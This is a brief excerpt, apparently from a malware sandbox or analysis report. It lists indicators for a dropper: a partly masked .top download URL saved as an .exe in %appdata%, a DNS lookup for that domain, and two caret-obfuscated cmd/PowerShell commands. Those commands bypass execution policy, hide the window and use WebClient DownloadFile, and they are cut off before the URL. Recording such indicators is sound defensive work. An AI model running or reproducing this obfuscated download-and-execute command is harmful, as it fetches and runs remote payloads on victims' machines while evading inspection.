Technical Information
- http://www.ev###ntlyts.top/user.php?f=##### as %appdata%.exe
- DNS ASK ev###ntlyts.top
- '<SYSTEM32>\cmd.exe' /c pOw^er^sh^eLl.^e^x^e^ -^eXecUt^IoNp^OLi^cY^ B^y^Pa^ss -nOprO^FI^le^ -^w^indow^st^Y^l^e^ h^Idde^n ^(n^e^w-O^b^j^e^c^t ^sys^t^em^.Ne^t^.^w^e^bcLie^nt^)^.dO^wNL^oa^d^f^Ile^('ht...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c pOw^er^sh^eLl.^e^x^e^ -^eXecUt^IoNp^OLi^cY^ B^y^Pa^ss -nOprO^FI^le^ -^w^indow^st^Y^l^e^ h^Idde^n ^(n^e^w-O^b^j^e^c^t ^sys^t^em^.Ne^t^.^w^e^bcLie^nt^)^.dO^wNL^oa^d^f^Ile^('ht...